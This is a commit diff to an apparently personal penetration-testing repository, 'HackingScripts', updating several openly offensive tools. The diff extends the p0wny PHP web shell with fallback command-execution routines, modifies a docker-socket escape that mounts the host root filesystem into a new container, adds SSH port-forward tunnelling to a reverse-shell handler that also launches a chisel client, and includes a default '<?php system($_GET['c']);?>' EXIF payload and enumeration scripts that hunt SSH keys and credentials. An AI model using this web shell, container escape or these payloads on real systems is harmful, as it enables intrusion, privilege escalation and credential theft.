Update Dependencies + paramiko port forwarding + some bug fixes

README.md

@@ -2,6 +2,12 @@
 
 This repository contains self-made and common scripts for information gathering, enumeration and more.
 
+### Installation
+```bash
+git clone git@romanh.de:Roman/HackingScripts
+sudo ln -s HackingScripts $(python -c "import sys;print(sys.path[-1])")/hackingscripts
+```
+
 ### Enumeration: Initial Scans
 - first_scan.sh: Performs initial nmap scan
 - gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt

deepce.sh

@@ -129,7 +129,7 @@ TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container
 TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
 
 DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
-DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
+DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override\|cap_sys_rawio\|cap_mknod"
 
 CONTAINER_CMDS="docker lxc rkt kubectl podman"
 USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
@@ -561,7 +561,13 @@ containerCapabilities() {
         printNo
     fi
   else
-    printError "Unknown (capsh not installed)"
+    caps=$(grep Cap /proc/self/status)
+    capEff=$(grep CapEff /proc/self/status | cut -d ':' -f 2 | tr -d '\t')
+    printError "capsh not installed, listing raw capabilities"
+    printInstallAdvice "libcap2-bin"
+    printStatus "Current capabilities are:"
+    printStatus "$caps"
+    printStatus "> This can be decoded with: \"capsh --decode=${capEff}\""
   fi
 }
 
@@ -1046,9 +1052,18 @@ exploitDockerSock() {
 
   nl
 
+  # Try to find an available docker image
+  json_data=$(curl -s --unix-socket /var/run/docker.sock http://localhost/images/json)
+  docker_img=$(echo "$json_data" | grep -o '"RepoTags":\["[^"]*' | grep -o '[^"]*$' | tail -1)
+
+  if [ -z "$docker_img" ]; then
+    printInfo 'No avaliable docker image found, using alpine'
+    docker_img="alpine" 
+  fi 
+
   # Create docker container using the docker sock
   payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
-  response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
+  response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"$docker_img\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
 
   if ! [ $? ]; then
     printError 'Something went wrong'

fileserver.py

@@ -137,7 +137,6 @@ class HttpFileServer(HTTPServer):
         self.prefix_routes = { }
         self.is_running = True
         self.listen_thread = None
-        self.has_exited = False
 
     def cleanPath(self, path):
 
@@ -231,9 +230,6 @@ class HttpFileServer(HTTPServer):
         self.listen_thread.start()
         return self.listen_thread
 
-    def start(self):
-        return self.serve_forever()
-
     def get_base_url():
         addr, port = self.server_address
         if port != 80:
@@ -243,28 +239,11 @@ class HttpFileServer(HTTPServer):
 
     def stop(self):
         self.is_running = False
-        time.sleep(1)
-
-        try:
-            # dummy request
-            for i in range(3):
-                requests.get(f"{self.get_base_url()}/dummy")
-                if self.has_exited:
-                    break
-                time.sleep(1)
-        except:
-            pass
-
+        time.sleep(1)       
+        self.shutdown()
         if self.listen_thread != threading.currentThread():
             self.listen_thread.join()
 
-    def serve_forever(self):
-        self.has_exited = False
-        while self.is_running:
-            self.handle_request()
-        self.has_exited = True
-
-
 if __name__ == "__main__":
     if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
         print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])

linux-exploit-suggester.sh

@@ -1,7 +1,7 @@
 #!/bin/bash
 
 #
-# Copyright (c) 2016-2022, @_mzet_
+# Copyright (c) 2016-2023, https://github.com/mzet-
 #
 # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
 # This is free software, and you are welcome to redistribute it

lse.sh

@@ -5,7 +5,7 @@
 # Author: Diego Blanco <diego.blanco@treitos.com>
 # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
 #
-lse_version="4.10nw"
+lse_version="4.13nw"
 
 ##( Colors
 #
@@ -611,6 +611,7 @@ lse_get_distro_codename() { #(
   elif [ -f /etc/os-release ]; then
     distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
     echo "$distro" | grep -qi opensuse && distro=opsuse
+    echo "$distro" | grep -qi rhel && distro=redhat
   elif [ -f /etc/redhat-release ]; then
     grep -qi "centos"  /etc/redhat-release && distro=centos
     grep -qi "fedora"  /etc/redhat-release && distro=fedora
@@ -635,7 +636,7 @@ lse_get_pkg_version() { #(
   pkg_name="$1"
   case "$lse_distro_codename" in
     debian|ubuntu)
-      pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
+      pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^[ih]i' | tr -s ' ' | cut -d' ' -f3`
       ;;
     centos|redhat|fedora|opsuse|rocky|amzn)
       pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
@@ -845,7 +846,7 @@ lse_run_tests_filesystem() {
   #looking for credentials in /etc/fstab and /etc/mtab
   lse_test "fst120" "0" \
     "Are there any credentials in fstab/mtab?" \
-    'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab'
+    'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials|cred)[=:]" /etc/fstab /etc/mtab'
 
   #check if current user has mail
   lse_test "fst130" "1" \
@@ -910,7 +911,7 @@ lse_run_tests_filesystem() {
   #check for SSH files anywhere
   lse_test "fst510" "2" \
     "SSH files anywhere" \
-    'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
+    'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
 
   #dump hosts.equiv file
   lse_test "fst520" "2" \

p0wny-shell.php

@@ -1,5 +1,10 @@
 <?php
 
+$SHELL_CONFIG = array(
+    'username' => 'p0wny',
+    'hostname' => 'shell',
+);
+
 function expandPath($path) {
     if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
         exec("echo $match[1]", $stdout);
@@ -8,8 +13,52 @@ function expandPath($path) {
     return $path;
 }
 
+function allFunctionExist($list = array()) {
+    foreach ($list as $entry) {
+        if (!function_exists($entry)) {
+            return false;
+        }
+    }
+    return true;
+}
+
+function executeCommand($cmd) {
+    $output = '';
+    if (function_exists('exec')) {
+        exec($cmd, $output);
+        $output = implode("\n", $output);
+    } else if (function_exists('shell_exec')) {
+        $output = shell_exec($cmd);
+    } else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
+        ob_start();
+        system($cmd);
+        $output = ob_get_contents();
+        ob_end_clean();
+    } else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
+        ob_start();
+        passthru($cmd);
+        $output = ob_get_contents();
+        ob_end_clean();
+    } else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
+        $handle = popen($cmd, 'r');
+        while (!feof($handle)) {
+            $output .= fread($handle, 4096);
+        }
+        pclose($handle);
+    } else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
+        $handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
+        $output = stream_get_contents($pipes[1]);
+        proc_close($handle);
+    }
+    return $output;
+}
+
+function isRunningWindows() {
+    return stripos(PHP_OS, "WIN") === 0;
+}
+
 function featureShell($cmd, $cwd) {
-    $stdout = array();
+    $stdout = "";
 
     if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
         chdir(expandPath("~"));
@@ -23,17 +72,17 @@ function featureShell($cmd, $cwd) {
         return featureDownload($match[1]);
     } else {
         chdir($cwd);
-        exec($cmd, $stdout);
+        $stdout = executeCommand($cmd);
     }
 
     return array(
-        "stdout" => $stdout,
-        "cwd" => getcwd()
+        "stdout" => base64_encode($stdout),
+        "cwd" => base64_encode(getcwd())
     );
 }
 
 function featurePwd() {
-    return array("cwd" => getcwd());
+    return array("cwd" => base64_encode(getcwd()));
 }
 
 function featureHint($fileName, $cwd, $type) {
@@ -45,6 +94,9 @@ function featureHint($fileName, $cwd, $type) {
     }
     $cmd = "/bin/bash -c \"$cmd\"";
     $files = explode("\n", shell_exec($cmd));
+    foreach ($files as &$filename) {
+        $filename = base64_encode($filename);
+    }
     return array(
         'files' => $files,
     );
@@ -54,12 +106,12 @@ function featureDownload($filePath) {
     $file = @file_get_contents($filePath);
     if ($file === FALSE) {
         return array(
-            'stdout' => array('File not found / no read permission.'),
-            'cwd' => getcwd()
+            'stdout' => base64_encode('File not found / no read permission.'),
+            'cwd' => base64_encode(getcwd())
         );
     } else {
         return array(
-            'name' => basename($filePath),
+            'name' => base64_encode(basename($filePath)),
             'file' => base64_encode($file)
         );
     }
@@ -70,19 +122,40 @@ function featureUpload($path, $file, $cwd) {
     $f = @fopen($path, 'wb');
     if ($f === FALSE) {
         return array(
-            'stdout' => array('Invalid path / no write permission.'),
-            'cwd' => getcwd()
+            'stdout' => base64_encode('Invalid path / no write permission.'),
+            'cwd' => base64_encode(getcwd())
         );
     } else {
         fwrite($f, base64_decode($file));
         fclose($f);
         return array(
-            'stdout' => array('Done.'),
-            'cwd' => getcwd()
+            'stdout' => base64_encode('Done.'),
+            'cwd' => base64_encode(getcwd())
         );
     }
 }
 
+function initShellConfig() {
+    global $SHELL_CONFIG;
+
+    if (isRunningWindows()) {
+        $username = getenv('USERNAME');
+        if ($username !== false) {
+            $SHELL_CONFIG['username'] = $username;
+        }
+    } else {
+        $pwuid = posix_getpwuid(posix_geteuid());
+        if ($pwuid !== false) {
+            $SHELL_CONFIG['username'] = $pwuid['name'];
+        }
+    }
+
+    $hostname = gethostname();
+    if ($hostname !== false) {
+        $SHELL_CONFIG['hostname'] = $hostname;
+    }
+}
+
 if (isset($_GET["feature"])) {
 
     $response = NULL;
@@ -108,6 +181,8 @@ if (isset($_GET["feature"])) {
     header("Content-Type: application/json");
     echo json_encode($response);
     die();
+} else {
+    initShellConfig();
 }
 
 ?><!DOCTYPE html>
@@ -125,6 +200,9 @@ if (isset($_GET["feature"])) {
                 background: #333;
                 color: #eee;
                 font-family: monospace;
+                width: 100vw;
+                height: 100vh;
+                overflow: hidden;
             }
 
             *::-webkit-scrollbar-track {
@@ -145,17 +223,21 @@ if (isset($_GET["feature"])) {
 
             #shell {
                 background: #222;
-                max-width: 800px;
-                margin: 50px auto 0 auto;
                 box-shadow: 0 0 5px rgba(0, 0, 0, .3);
                 font-size: 10pt;
                 display: flex;
                 flex-direction: column;
                 align-items: stretch;
+                max-width: calc(100vw - 2 * var(--shell-margin));
+                max-height: calc(100vh - 2 * var(--shell-margin));
+                resize: both;
+                overflow: hidden;
+                width: 100%;
+                height: 100%;
+                margin: var(--shell-margin) auto;
             }
 
             #shell-content {
-                height: 500px;
                 overflow: auto;
                 padding: 5px;
                 white-space: pre-wrap;
@@ -168,20 +250,27 @@ if (isset($_GET["feature"])) {
                 text-align: center;
             }
 
-            @media (max-width: 991px) {
+            :root {
+                --shell-margin: 25px;
+            }
+
+            @media (min-width: 1200px) {
+                :root {
+                    --shell-margin: 50px !important;
+                }
+            }
+
+            @media (max-width: 991px),
+                   (max-height: 600px) {
                 #shell-logo {
                     font-size: 6px;
                     margin: -25px 0;
                 }
-
-                html, body, #shell {
-                    height: 100%;
-                    width: 100%;
-                    max-width: none;
+                :root {
+                    --shell-margin: 0 !important;
                 }
-
                 #shell {
-                    margin-top: 0;
+                    resize: none;
                 }
             }
 
@@ -210,6 +299,7 @@ if (isset($_GET["feature"])) {
                 display: flex;
                 box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
                 border-top: rgba(255, 255, 255, .05) solid 1px;
+                padding: 10px 0;
             }
 
             #shell-input > label {
@@ -230,6 +320,7 @@ if (isset($_GET["feature"])) {
                 font-size: 10pt;
                 width: 100%;
                 align-self: center;
+                box-sizing: border-box;
             }
 
             #shell-input div {
@@ -243,6 +334,7 @@ if (isset($_GET["feature"])) {
         </style>
 
         <script>
+            var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
             var CWD = null;
             var commandHistory = [];
             var historyPosition = 0;
@@ -277,10 +369,10 @@ if (isset($_GET["feature"])) {
                 } else {
                     makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
                         if (response.hasOwnProperty('file')) {
-                            featureDownload(response.name, response.file)
+                            featureDownload(atob(response.name), response.file)
                         } else {
-                            _insertStdout(response.stdout.join("\n"));
-                            updateCwd(response.cwd);
+                            _insertStdout(atob(response.stdout));
+                            updateCwd(atob(response.cwd));
                         }
                     });
                 }
@@ -291,7 +383,9 @@ if (isset($_GET["feature"])) {
 
                 function _requestCallback(data) {
                     if (data.files.length <= 1) return;  // no completion
-
+                    data.files = data.files.map(function(file){
+                        return atob(file);
+                    });
                     if (data.files.length === 2) {
                         if (type === 'cmd') {
                             eShellCmdInput.value = data.files[0];
@@ -341,8 +435,8 @@ if (isset($_GET["feature"])) {
                     var promise = getBase64(element.files[0]);
                     promise.then(function (file) {
                         makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
-                            _insertStdout(response.stdout.join("\n"));
-                            updateCwd(response.cwd);
+                            _insertStdout(atob(response.stdout));
+                            updateCwd(atob(response.cwd));
                         });
                     }, function () {
                         _insertStdout('An unknown client-side error occurred.');
@@ -368,7 +462,7 @@ if (isset($_GET["feature"])) {
                     var splittedCwd = cwd.split("/");
                     shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
                 }
-                return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
+                return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
             }
 
             function updateCwd(cwd) {
@@ -378,7 +472,7 @@ if (isset($_GET["feature"])) {
                     return;
                 }
                 makeRequest("?feature=pwd", {}, function(response) {
-                    CWD = response.cwd;
+                    CWD = atob(response.cwd);
                     _updatePrompt();
                 });
 

rev_shell.py

@@ -11,6 +11,13 @@ import threading
 import paramiko
 import readline
 import base64
+import select
+
+
+try:
+    import SocketServer
+except ImportError:
+    import socketserver as SocketServer
 
 class ShellListener:
 
@@ -162,6 +169,97 @@ class ShellListener:
         if permissions:
             self.sendline(f"chmod {permissions} {path}")
 
+class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
+    daemon_threads = True
+    allow_reuse_address = True
+
+
+class ParamikoTunnel:
+    def __init__(self, shell, ports):
+        self.shell = shell
+        self.ports = ports
+        self.verbose = False
+        self.is_running = True
+        self.on_message = []
+        self.listen_threads = []
+        self.servers = []
+
+    def start_background(self):
+        for port in self.ports:
+            thread = threading.Thread(target=self.start, args=(port, ))
+            thread.start()
+            self.listen_threads.append(thread)
+        return self.listen_threads
+
+    def start(self, port):
+        this = self
+        class SubHandler(ParamikoTunnelHandler):
+            peer = this.shell.get_transport().sock.getpeername()
+            chain_host = "127.0.0.1"
+            chain_port = port
+            ssh_transport = this.shell.get_transport()
+            def log(self, message):
+                if this.verbose:
+                    print(message)
+
+        forward_server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
+        self.servers.append(forward_server)
+        forward_server.serve_forever()
+
+    def close(self):
+        self.is_running = False
+        for server in self.servers:
+            server._BaseServer__shutdown_request = True
+        for thread in self.listen_threads:
+            thread.join()
+
+class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
+    def handle(self):
+        try:
+            chan = self.ssh_transport.open_channel(
+                "direct-tcpip",
+                (self.chain_host, self.chain_port),
+                self.request.getpeername(),
+            )
+        except Exception as e:
+            self.log(
+                "Incoming request to %s:%d failed: %s"
+                % (self.chain_host, self.chain_port, repr(e))
+            )
+            return
+        if chan is None:
+            self.log(
+                "Incoming request to %s:%d was rejected by the SSH server."
+                % (self.chain_host, self.chain_port)
+            )
+            return
+
+        self.log(
+            "Connected!  Tunnel open %r -> %r -> %r"
+            % (
+                self.request.getpeername(),
+                chan.getpeername(),
+                (self.chain_host, self.chain_port),
+            )
+        )
+        while True:
+            r, w, x = select.select([self.request, chan], [], [])
+            if self.request in r:
+                data = self.request.recv(1024)
+                if len(data) == 0:
+                    break
+                chan.send(data)
+            if chan in r:
+                data = chan.recv(1024)
+                if len(data) == 0:
+                    break
+                self.request.send(data)
+
+        peername = self.request.getpeername()
+        chan.close()
+        self.request.close()
+        self.log("Tunnel closed from %r" % (peername,))
+
 def generate_payload(type, local_address, port, index=None):
 
     commands = []
@@ -238,7 +336,13 @@ def create_tunnel(shell, ports: list):
         t.start()
 
         shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
+        return t
     elif isinstance(shell, paramiko.SSHClient):
+
+        paramiko_tunnel = ParamikoTunnel(shell, ports)
+        paramiko_tunnel.start_background()
+        return paramiko_tunnel
+
         # TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
         pass
 

uptux.py

@@ -1,7 +1,9 @@
 #!/usr/bin/env python
 
 import random
+import math
 import socket
+import itertools
 import netifaces as ni
 import string
 import sys
@@ -44,15 +46,20 @@ def exit_with_error(res, err):
     exit()
 
 def assert_status_code(res, status_code, err=None):
-    if res.status_code != status_code:
+    if type(status_code) == int and res.status_code != status_code:
         err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
         exit_with_error(res, err)
+    elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
+        err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(status_code)}" if err is None else err
+        exit_with_error(res, err)
 
-def assert_header_present(res, header, err=None):
-    if header in res.headers:
+def assert_location(res, location, err=None):
+    assert_header_present(res, "Location")
+    location_header = res.headers["Location"].lower()
+    if location_header == location.lower():
         return
-        
-    err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
+
+    err = f"[-] '{res.url}' returned unexpected location {location_header}, expected: {location}" if err is None else err
     exit_with_error(res, err)
 
 def assert_content_type(res, content_type, err=None):
@@ -66,6 +73,13 @@ def assert_content_type(res, content_type, err=None):
     err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
     exit_with_error(res, err)
 
+def assert_header_present(res, header, err=None):
+    if header in res.headers:
+        return
+        
+    err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
+    exit_with_error(res, err)
+
 def openServer(address, ports=None):
     listenPort = None
     retry = True
@@ -149,6 +163,29 @@ def pad(x, n):
         x  += (n-(len(x)%n))*b"\x00"
     return x
 
+def xor(a, b):
+    if len(a) == 0 or len(b) == 0:
+        return a
+
+    if len(a) < len(b):
+        a *= int(math.ceil((len(b)/len(a))))
+        a = a[0:len(b)]
+    elif len(b) < len(a):
+        b *= int(math.ceil((len(a)/len(b))))
+        b = b[0:len(a)]
+
+    if type(a) == str and type(b) == str:
+        return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(a, b) ])
+    else:
+        if type(a) != bytes:
+            a = a.encode()
+        if type(b) != bytes:
+            b = b.encode()
+
+        
+
+    return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
+
 def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
     import exif
 

win/winPEAS.bat

@@ -10,6 +10,14 @@ REM Registry scan of other drives besides
 REM /////true or false
 SET long=false
 
+REM Check if the current path contains spaces
+SET "CurrentFolder=%~dp0"
+IF "!CurrentFolder!" NEQ "!CurrentFolder: =!" (
+    ECHO winPEAS.bat cannot run if the current path contains spaces.
+	ECHO Exiting.
+    EXIT /B 1
+)
+
 :Splash
 ECHO.
 CALL :ColorLine "            %E%32m((,.,/((((((((((((((((((((/,  */%E%97m"
@@ -52,7 +60,7 @@ CALL :ColorLine "   %E%41mUse it at your own networks and/or with the network ow
 ECHO.
 
 :SystemInfo
-CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
+CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
 CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
 ECHO.   [i] Check for vulnerabilities for the OS version with the applied patches
 ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
@@ -404,7 +412,7 @@ CALL :T_Progress 1
 
 :CurrentClipboard
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
-ECHO.   [i] Any password inside the clipboard?
+ECHO.   [i] Any passwords inside the clipboard?
 powershell -command "Get-Clipboard" 2>nul
 ECHO.
 CALL :T_Progress 1
@@ -565,7 +573,7 @@ CALL :T_Progress 2
 
 :AppCMD
 CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
+ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
 IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. 
 ECHO.
 CALL :T_Progress 2